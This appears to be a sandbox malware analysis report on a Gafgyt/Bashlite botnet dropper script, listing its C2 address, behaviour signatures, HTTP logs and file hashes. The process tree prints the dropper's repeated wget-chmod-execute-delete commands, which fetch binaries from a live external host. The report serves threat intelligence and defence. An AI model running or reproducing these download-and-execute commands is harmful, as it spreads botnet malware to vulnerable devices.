Analysis

  • max time kernel
    15s
  • max time network
    40s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    25-12-2024 15:52

General

  • Target

    gtop.sh

  • Size

    2KB

  • MD5

    297b82d777e2257fda8221703403b2d3

  • SHA1

    d1ebd4f576bf89adcdf9453879c3ae2adeeb42ed

  • SHA256

    7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af

  • SHA512

    dc0fc05650eca6bde3d5b02568e68810c61e1b6b58f5bb31f4847ef4082cd63f7aae45db042ec4e7f659615e761dcd472c6b8e20abd6e8431a3bd0c0f2ecea81

Malware Config

Extracted

Family

gafgyt

C2

154.213.186.115:4444

Signatures

  • Detected Gafgyt variant (9 IoCs)
  • Gafgyt family
  • Gafgyt/Bashlite
    IoT botnet with numerous variants first seen in 2014.
  • File and Directory Permissions Modification (1 TTP, 9 IoCs)
    Adversaries may modify file or directory permissions to evade defenses.
  • Executes dropped EXE (9 IoCs)
  • System Network Configuration Discovery (1 TTP, 9 IoCs)
    Adversaries may gather information about the network configuration of a system.
  • Writes file to tmp directory (9 IoCs)
    Malware often drops required files in the /tmp directory.

Processes

Process tree (parent first, children indented; the signatures triggered by each process follow its command line):

  • /tmp/gtop.sh (PID 666)
    /tmp/gtop.sh
    • /usr/bin/wget (PID 671)
      wget http://141.95.84.4:1594/jackmymips
      System Network Configuration Discovery; Writes file to tmp directory
    • /bin/chmod (PID 692)
      chmod +x jackmymips
      File and Directory Permissions Modification
    • /tmp/jackmymips (PID 694)
      ./jackmymips
      Executes dropped EXE; System Network Configuration Discovery
    • /bin/rm (PID 698)
      rm -rf jackmymips
      System Network Configuration Discovery
    • /usr/bin/wget (PID 699)
      wget http://141.95.84.4:1594/jackmymips64
      System Network Configuration Discovery; Writes file to tmp directory
    • /bin/chmod (PID 701)
      chmod +x jackmymips64
      File and Directory Permissions Modification
    • /tmp/jackmymips64 (PID 703)
      ./jackmymips64
      Executes dropped EXE; System Network Configuration Discovery
    • /bin/rm (PID 705)
      rm -rf jackmymips64
      System Network Configuration Discovery
    • /usr/bin/wget (PID 706)
      wget http://141.95.84.4:1594/jackmymipsel
      System Network Configuration Discovery; Writes file to tmp directory
    • /bin/chmod (PID 707)
      chmod +x jackmymipsel
      File and Directory Permissions Modification
    • /tmp/jackmymipsel (PID 708)
      ./jackmymipsel
      Executes dropped EXE; System Network Configuration Discovery
    • /bin/rm (PID 710)
      rm -rf jackmymipsel
      System Network Configuration Discovery
    • /usr/bin/wget (PID 711)
      wget http://141.95.84.4:1594/jackmysh4
      Writes file to tmp directory
    • /bin/chmod (PID 712)
      chmod +x jackmysh4
      File and Directory Permissions Modification
    • /tmp/jackmysh4 (PID 713)
      ./jackmysh4
      Executes dropped EXE
    • /bin/rm (PID 715)
      rm -rf jackmysh4
    • /usr/bin/wget (PID 716)
      wget http://141.95.84.4:1594/jackmyx86
      Writes file to tmp directory
    • /bin/chmod (PID 717)
      chmod +x jackmyx86
      File and Directory Permissions Modification
    • /tmp/jackmyx86 (PID 718)
      ./jackmyx86
      Executes dropped EXE
    • /bin/rm (PID 720)
      rm -rf jackmyx86
    • /usr/bin/wget (PID 721)
      wget http://141.95.84.4:1594/jackmyi486
      Writes file to tmp directory
    • /bin/chmod (PID 724)
      chmod +x jackmyi486
      File and Directory Permissions Modification
    • /tmp/jackmyi486 (PID 725)
      ./jackmyi486
      Executes dropped EXE
    • /bin/rm (PID 728)
      rm -rf jackmyi486
    • /usr/bin/wget (PID 729)
      wget http://141.95.84.4:1594/jackmyi586
      Writes file to tmp directory
    • /bin/chmod (PID 733)
      chmod +x jackmyi586
      File and Directory Permissions Modification
    • /tmp/jackmyi586 (PID 734)
      ./jackmyi586
      Executes dropped EXE
    • /bin/rm (PID 736)
      rm -rf jackmyi586
    • /usr/bin/wget (PID 738)
      wget http://141.95.84.4:1594/jackmyi686
      Writes file to tmp directory
    • /bin/chmod (PID 742)
      chmod +x jackmyi686
      File and Directory Permissions Modification
    • /tmp/jackmyi686 (PID 743)
      ./jackmyi686
      Executes dropped EXE
    • /bin/rm (PID 745)
      rm -rf jackmyi686
    • /usr/bin/wget (PID 747)
      wget http://141.95.84.4:1594/jackmypowerpc
      Writes file to tmp directory
    • /bin/chmod (PID 757)
      chmod +x jackmypowerpc
      File and Directory Permissions Modification
    • /tmp/jackmypowerpc (PID 759)
      ./jackmypowerpc
      Executes dropped EXE
    • /bin/rm (PID 761)
      rm -rf jackmypowerpc
    • /usr/bin/wget (PID 763)
      wget http://141.95.84.4:1594/jackmym86k

Network

HTTP requests (all to remote address 141.95.84.4:1594, shown with a DE country flag in the report):

  • GET http://141.95.84.4:1594/jackmymips
    Request
      GET /jackmymips HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:11 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
      ETag: "31cc4-629f032c5bcb8"
      Accept-Ranges: bytes
      Content-Length: 203972
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmymips64
    Request
      GET /jackmymips64 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:13 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
      ETag: "3d2c2-629f032c5dbf8"
      Accept-Ranges: bytes
      Content-Length: 250562
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmymipsel
    Request
      GET /jackmymipsel HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:15 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
      ETag: "31cc4-629f032c5f750"
      Accept-Ranges: bytes
      Content-Length: 203972
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmysh4
    Request
      GET /jackmysh4 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:16 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
      ETag: "24aae-629f032c61690"
      Accept-Ranges: bytes
      Content-Length: 150190
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmyx86
    Request
      GET /jackmyx86 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:17 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
      ETag: "2708f-629f032c631e9"
      Accept-Ranges: bytes
      Content-Length: 159887
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmyi486
    Request
      GET /jackmyi486 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:19 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
      ETag: "1f934-629f032c64d41"
      Accept-Ranges: bytes
      Content-Length: 129332
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmyi586
    Request
      GET /jackmyi586 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:20 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
      ETag: "21da6-629f032c66c81"
      Accept-Ranges: bytes
      Content-Length: 138662
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmyi686
    Request
      GET /jackmyi686 HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:21 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
      ETag: "22d07-629f032c68bc1"
      Accept-Ranges: bytes
      Content-Length: 142599
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
  • GET http://141.95.84.4:1594/jackmypowerpc
    Request
      GET /jackmypowerpc HTTP/1.1
      User-Agent: Wget/1.18 (linux-gnueabihf)
      Accept: */*
      Accept-Encoding: identity
      Host: 141.95.84.4:1594
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Date: Wed, 25 Dec 2024 15:52:23 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
      ETag: "25a15-629f032c6ab01"
      Accept-Ranges: bytes
      Content-Length: 154133
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive

Connections (destination, URL, protocol, bytes sent / received, packets sent / received, HTTP status):

  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmymips  http
    4.7kB sent / 213.0kB received, 86 / 142 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmymips
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmymips64  http
    4.3kB sent / 260.2kB received, 79 / 180 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmymips64
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmymipsel  http
    3.2kB sent / 211.7kB received, 58 / 144 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmymipsel
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmysh4  http
    3.1kB sent / 155.9kB received, 56 / 104 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmysh4
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmyx86  http
    2.7kB sent / 166.5kB received, 48 / 121 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmyx86
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmyi486  http
    2.6kB sent / 134.6kB received, 47 / 96 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmyi486
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmyi586  http
    3.2kB sent / 144.2kB received, 58 / 101 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmyi586
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmyi686  http
    3.5kB sent / 149.9kB received, 64 / 110 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmyi686
    HTTP Response: 200
  • 141.95.84.4:1594  http://141.95.84.4:1594/jackmypowerpc  http
    2.9kB sent / 160.3kB received, 52 / 113 packets
    HTTP Request: GET http://141.95.84.4:1594/jackmypowerpc
    HTTP Response: 200
                  MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/jackmyi486
    Filesize
    126KB
    MD5
    37bc4b1d4fce9500ee4fee154e61d9e6
    SHA1
    6fddc8858547e60672cca66857ceb7293638a057
    SHA256
    72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c
    SHA512
    3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb
  • /tmp/jackmyi586
    Filesize
    135KB
    MD5
    4ca387e1408f29f6ed1979acfb671f82
    SHA1
    3467879b5fd631a5884f947ba013d61ea8a33c91
    SHA256
    1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d
    SHA512
    18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738
  • /tmp/jackmyi686
    Filesize
    139KB
    MD5
    1aeb2935aec67978bfdab8243470b577
    SHA1
    b26b260d86609e9c758279c59eb8caec53fd0f69
    SHA256
    936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57
    SHA512
    3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce
  • /tmp/jackmymips
    Filesize
    199KB
    MD5
    f2ab2725ea6c883a5c608bc365c41fe5
    SHA1
    454d6983d9a7bb59aa0441b2c2cc805a97738e66
    SHA256
    531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d
    SHA512
    572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26
  • /tmp/jackmymips64
    Filesize
    244KB
    MD5
    89655c0a64c3552ee71dc901a3561ad1
    SHA1
    8a488927882c18b5a35da06c6428f8707d4314ad
    SHA256
    08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04
    SHA512
    23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f
  • /tmp/jackmymipsel
    Filesize
    199KB
    MD5
    caabd697c443462f0a04d6b30529df58
    SHA1
    4fcb97074d1971ebfa482aad5edf208b43b6d819
    SHA256
    5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf
    SHA512
    abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8
  • /tmp/jackmypowerpc
    Filesize
    150KB
    MD5
    29f174a35d868d69945c412c159184dd
    SHA1
    7ac1d35bdbe15fed8443341de0875579ec8099d0
    SHA256
    b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b
    SHA512
    6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899
  • /tmp/jackmysh4
    Filesize
    146KB
    MD5
    2a8e0da501cea8f8d32893a5fd6c9aab
    SHA1
    29b2be373b4155632926b9656861bebd53264473
    SHA256
    17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1
    SHA512
    64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7
  • /tmp/jackmyx86
    Filesize
    156KB
    MD5
    afcb3a143b9f4e3a985c3eeb2e2ae4c8
    SHA1
    295f0e0380f71feb1c8911e29882db6a792bbd58
    SHA256
    fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c
    SHA512
    b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08
